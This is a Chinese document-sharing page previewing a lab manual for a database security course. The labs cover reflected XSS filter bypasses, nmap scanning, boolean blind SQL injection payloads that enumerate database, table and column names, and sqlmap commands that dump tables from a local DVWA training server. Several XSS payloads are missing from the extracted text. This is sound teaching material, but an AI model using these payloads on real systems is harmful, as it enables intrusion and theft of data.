欢迎来到冰点文库! | 帮助中心 分享价值,成长自我!
冰点文库
全部分类
  • 临时分类>
  • IT计算机>
  • 经管营销>
  • 医药卫生>
  • 自然科学>
  • 农林牧渔>
  • 人文社科>
  • 工程科技>
  • PPT模板>
  • 求职职场>
  • 解决方案>
  • 总结汇报>
  • ImageVerifierCode 换一换
    首页 冰点文库 > 资源分类 > DOCX文档下载
    分享到微信 分享到微博 分享到QQ空间

    数据库应用与安全管理实训3.docx

    • 资源ID:16234875       资源大小:16.50KB        全文页数:8页
    • 资源格式: DOCX        下载积分:3金币
    快捷下载 游客一键下载
    账号登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录 QQ登录
    二维码
    微信扫一扫登录
    下载资源需要3金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP,免费下载
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    数据库应用与安全管理实训3.docx

    1、数据库应用与安全管理实训3实训 反射型XSS 1一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。(2)在URL地址框中输入alert(/xss/),出现弹框。(3)在URL地址框中输入alert(document.cookie),出现弹框,获得当前页面的cookie。3. 将操作过程截图,整理文档后上传平台。实训 反射

    2、型XSS 2一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Medium。2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。(2)在URL地址框中输入alert(/xss/),没有弹框。(3)选择“View Source”查看源程序,发现服务器端使用str_replace()函数对“”进行了替换,直接插入代码失效。(4)双写绕过。在”中在插入”的方式,实现绕过,具体格式如下:

    3、 script 添加弹框。获得cookie。(5)大小写混淆绕过。将”进行大小写的变换,绕过str_replace()函数的检测。具体格式如下:添加弹框。获得cookie。3. 将操作过程截图,整理文档后上传平台。实训 反射型XSS 3一、实训目的1. 了解XSS不同类型的异同2. 掌握反射型XSS的利用二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为High。2. 反射型XSS漏洞挖掘(1)点击XSS(Reflected),进入测试页面。(2)选择“View Source

    4、”查看源程序,发现对“/”进行了替换,不能使用常用的绕过方法。(3)使用标签,如、等提供的方法进行脚本的注入。 标签弹窗: 标签获取cookie: 标签弹窗: 标签获取cookie:3. 将操作过程截图,整理文档后上传平台。主动扫描一、实验内容主动扫描。二、实验环境BackTrack /Kali Linux。三、实验操作步骤单个主机扫描:nmap ip单个主机在线状态扫描:nmap sn ip多个不连续主机扫描:nmap ip1 ip2 ip3多个连续主机扫描:nmap ip地址的范围整个子网扫描:nmap ip地址/掩码位数1、 主机发现。跳过ping扫描阶段:nmap PN ip仅使用pi

    5、ng协议进行主机发现:nmap sP ip 使用ARP协议进行主机发现:nmap PR ip使用TCP协议进行主机发现:半开扫描:nmap sS ip 全开扫描:nmap sT ip使用UDP协议进行主机发现:nmap -sU ip 2、 端口发现。扫描全部端口:nmap p “*”ip扫描前n个端口:nmap -top-port n ip扫描指定端口:nmap p 端口号 ip3、 扫描目标操作系统:nmap O ip4、扫描目标服务:nmap sV ip5、扫描结果保存:nmap oX Report.xml ip 四、应用拓展1、主动扫描工具的实例使用。实训 SQL注入(布尔盲注)1一、实

    6、训目的1. 了解SQL注入的常用方式2. 掌握SQL布尔盲注的方法二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。2. 测试SQL注入点(1)点击SQL Injection(Blind),进入测试页面。(2)使用参数1 and 1=1 #进行提交,页面显示存在。使用参数1 and 1=2 #进行提交,页面显示不存在(3)猜解数据库名的长度。具体命令如下: 1 and length(database()=1 # /显示不存在 1 and length(database

    7、()=2 # /显示不存在 1 and length(database()=3 # /显示不存在 1 and length(database()=4 # /显示存在(4)二分法猜解数据库名。具体命令如下: 1 and ascii(substr(database(),1,1)100 # /显示不存在修改substr函数的第二个参数,如substr(database(),2,1)进行测试,可以获得数据库的第二个字母。(5)猜解数据库表的数量。具体命令如下: 1 and (select count(table_name) from information_schema.tables where ta

    8、ble_schema=database()=1 # /显示不存在 1 and (select count(table_name) from information_schema.tables where table_schema=database()=2 # /显示存在(6)猜解数据库表名的长度。具体命令格式如下: 1 and length(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=1 # /显示不存在 1 and length(subs

    9、tr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=9 # /显示存在(7)猜解数据库表的名称。具体命令格式如下: 1 and ascii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)103 # /显示不存在重复上述步骤,猜解出两个表名。(8)猜解数据库表中的字段长度。具体命令格式如下: 1 and

    10、(select count(column_name) from information_schema.columns where table_name= users)=1 # /显示不存在 1 and (select count(column_name) from information_schema.columns where table_name= users)=8 # /显示存在(9)猜解数据库表中的字段名称。具体命令格式如下: 1 and ascii(substr(select column_name from information_schema.columns where tabl

    11、e_name= users limit 0,1),1,1)117 # /显示不存在 1 and ascii(substr(select column_name from information_schema.columns where table_name= users limit 0,1),1,1)97 # /显示不存在 1 and ascii(substr(select first_name from users limit 0,1),1,1)97 # /显示不存在3. 将操作过程截图,整理文档后上传平台。实训 SQL注入(SQLMAP)一、实训目的1. 了解SQL注入的常用方式2. 掌握

    12、SQL工具注入的方法二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)3. SQLMAP工具三、实训内容1. 配置DVWA平台进入DVWA平台,选择DVWA Security,将安全级别设置为Low。2. 测试SQL注入点(1)点击SQL Injection,进入测试页面。(2)在kali中调用sqlmap工具,使用命令“sqlmap u 目标地址”进行测试,系统直接跳转到登陆页面。(3)通过检查浏览器元素,在请求头中,查找到当前浏览器的cookie值。(4)添加-cookie参数,完成SQL注入测试。具体命令如下: sqlmap -u http:/192.168.124.

    13、21/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low;PHPSESSID=4s878sd8gdop57r8l5ncdidv13“其中192.168.124.21是dvwa服务器的地址。(5)在前面的命令后加入-batch参数,sqlmap会自动填写参数并执行。发现SQL注入点。(6)获取当前数据库名称。具体命令格式如下: 添加参数-dbs (7)获取数据库中的表名。具体命令格式如下: 使用-D xxx指定查看的数据库,用-tables查看该数据库的所有表(8)获取users表中的字段名。具体命令格式如下: 使用-D xxx -T ttt指定查看的表,用-columns枚举表中的所有字段信息(9)获取表中的数据。具体命令格式如下: 使用-D xxx -T ttt -C ccc指定查看的字段, 用-dump转储DBMS数据表项3. 将操作过程截图,整理文档后上传平台。


    注意事项

    本文(数据库应用与安全管理实训3.docx)为本站会员主动上传,冰点文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰点文库(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

    copyright@ 2008-2023 冰点文库 网站版权所有

    经营许可证编号:鄂ICP备19020893号-2


    收起
    展开